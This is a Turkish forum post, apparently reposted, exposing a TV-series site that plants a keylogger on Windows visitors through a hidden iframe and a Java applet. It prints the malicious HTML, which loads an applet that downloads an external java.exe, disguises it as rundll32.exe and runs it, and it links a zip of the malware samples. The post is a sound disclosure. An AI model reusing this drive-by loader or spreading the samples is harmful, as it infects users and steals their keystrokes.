Bu bilgileri sözlğk kullanıcısından aldım. Şimdiden verdiği bilgiler için teşekkürler.
windows bilgisayarlarda cok yuksek ihtimalle (edit: dogrulandi!) bir virus calistiran bir sitedir. evet, kullanicilarin klavyelerinde bastiklari her tusu (sifreler, mesajlar vb, bir dosyaya kaydedip o dosyayi baskasina yolluyor) (bkz: keylogger)
(cok uzun lan bu okumam diyenlere ozet: diziport, java applet'ler araciligiyla baska bir siteden keylogger programi indirip onu calistiriyor)
nasil bir sey yaptiklarini birlikte gorelim.
sitenin kaynak kodunda,
--- kod 1---
<a href="http://twitter.com/diziport" title="" style="font-size:12px;"><iframe name="java" src="www.metinozdogan.com.tr/java/" width="1" height="1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe></a>
--- kod 1 ---
seklinde bir satir var. bunun yaptigi sey, siz sitenizi acinca tarayicida gorunmeyen bir pencerede metin ozdogan'in sitesinden (evet adini da yazalim da ne numaralar cevrildigi belli olsun) kodda gorulen sayfayi cagiriyor. (bkz: iframe)
peki bu sayfada ne var? "www.metinozdogan.com.tr/java/client.jar" seklinde bir java applet'i yukleyen bir kod. (dosya silinmis ama entry'nin devaminda butun bu dosyalar indirilebilir)
--- kod 2 ---
<applet code='javaupdater.class' width='1' height='1' archive='www.metinozdogan.com.tr/java/client.jar'>
<param name="url" value="www.medyaturk24.com/java/java.exe" />
</applet>
--- kod 2 ---
peki bu client.jar'in icinde ne var diyorsaniz, indirip decompile edip gorelim. icinden javaupdater.class cikiyor. hatta bakin ne guzel, hazir yapilmisi var:
peki bu java kodu ne yapiyor biraz aciklayacak olursak,
1) (windows bilgisayarlarda) c:\documents and settings\kullaniciadiniz\rundll32.exe seklinde, sistem dosyasi gibi gorunen ama aslinda sistem dosyasi olmayan bir dosya yaratiyor.
2) sonra kod 2'deki (bakin yukarda) url parametresinde yazan www.medyaturk24.com/java/java.exe (tiklamayin) dosyasini bilgisayariniza indiriyor ve bu dosyayi iste o rundll32.exe'nin icine yazip bilgisayara koyuyor.
3) sonra da bu internetten indirdigi dosyayi bilgisayarinizda calistiriyor. (kod 3, satir 50).
adresine gittiginizde muhtemelen daha once kullandiklari virusleri (ya da ne haltsa artik?) bulabiliyorsunuz. (82.exe 83.exe 84.exe 85.exe java.exe)
olur da silinir diye, butun bu dosyalari (exe'ler, .class, jar) zipleyip http://ge.tt/9dzsvf9 adresine koydum. link expire olursa isteyen yazarlar mesaj atabilirler tekrar koyarim.
java.exe adiyla gorunen dosyanin ne yaptigini benden daha tecrubeli reverse engineer'lara birakiyorum. sanirim emrah beyazkaya (() (diziport'un sahibi) simdi bize bir aciklama borclu, kim bu metin ozdogan, ne bu medyaturk'ten cekilen java.exe ve neden insanlarin bilgisayarlarinda calistiriliyor.
Ben Ubuntu kullanıyorum umarım etkilenmemişimdir. exe Keylogger bulaşmadığını düşünüyorum sizce?
